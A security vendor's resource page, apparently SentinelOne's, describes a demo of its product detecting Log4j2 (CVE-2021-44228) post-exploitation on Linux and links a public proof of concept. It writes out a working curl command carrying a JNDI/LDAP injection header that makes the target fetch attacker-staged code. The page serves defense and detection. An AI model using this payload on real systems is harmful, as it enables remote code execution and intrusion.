리소스 살펴보기
/
SentinelOne vs Apache Log4j2 (CVE-2021-44228) – Linux – Detection, Prevention & Mitigation
12월 12, 2021
SentinelOne vs Apache Log4j2 (CVE-2021-44228) – Linux – Detection, Prevention & Mitigation
Watch SentinelOne protect against the Log4j2 post-exploitation attempts. In this Linux demo, we used a publicly available POC with a weaponized malicious script as the post-exploit payload. Read more on our blog to learn more and stay protected.
https://www.sentinelone.com/blog/cve-2021-44228-staying-secure-apache-log4j-vulnerability/
Spotted exploit attempts in the wild thus far have led to commodity crypto miner payloads or other known and commodity post-exploitation methods. SentinelOne expects further opportunistic abuse by a wide variety of attackers, including ransomware and nation-state actors.
Potential attack vectors that are covered by the Singularity XDR platform include various post-exploitation frameworks such as Cobaltstrike, Empire, Metasploit, and usage of post-exploitation tools such as Mimikatz and Bloodhound as well as ransomware attacks and cryptominer activity.
PoC Reference: https://archive.org/details/github.com-tangxiaofeng7-CVE-2021-44228-Apache-Log4j-Rce_-_2021-12-11_07-40-15
The PoC used in the SentinelOne video is based on the above PoC. This same code can be used to spawn a variety of code on the targeted endpoint. In this case, we utilized a malicious PowerShell script (launched via .bat)
The tangxiaofeng7 (public) proof-of-concept code is utilized to stage the ‘malicious’ LDAP environment and respond to the appropriate client queries/traffic.
The exploit is delivered to the target host via CURL
curl 192.168.xxx.xxx:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.xxx.xxx:1389/STRING}'
With the LDAP destination nested in the CURL url, the target host will reach out to the attack server, resulting in the attacker’s staged code being executed (in the case of this demo (explorer.exe c:temprun.bat)
Watch our Windows demo here: https://youtu.be/z5knUL9rT0U
관련 리소스
데이터시트
Singularity™ Complete AI 지원 엔드포인트와 클라우드 보안
점점 더 복잡해지는 보안 아키텍처와 데이터 소스, 제한된 리소스, 더욱 정교해지는 공격에 직면한 보안 팀은 AI 지원 공격 세례에 대비하느라…
지금 읽기
Resource
SentinelOne PartnerOne - America's 2025
⛳️ Last week in Pebble Beach the America's best cybersecurity partners came together for our annual PartnerOne summit. Check out…
View Asset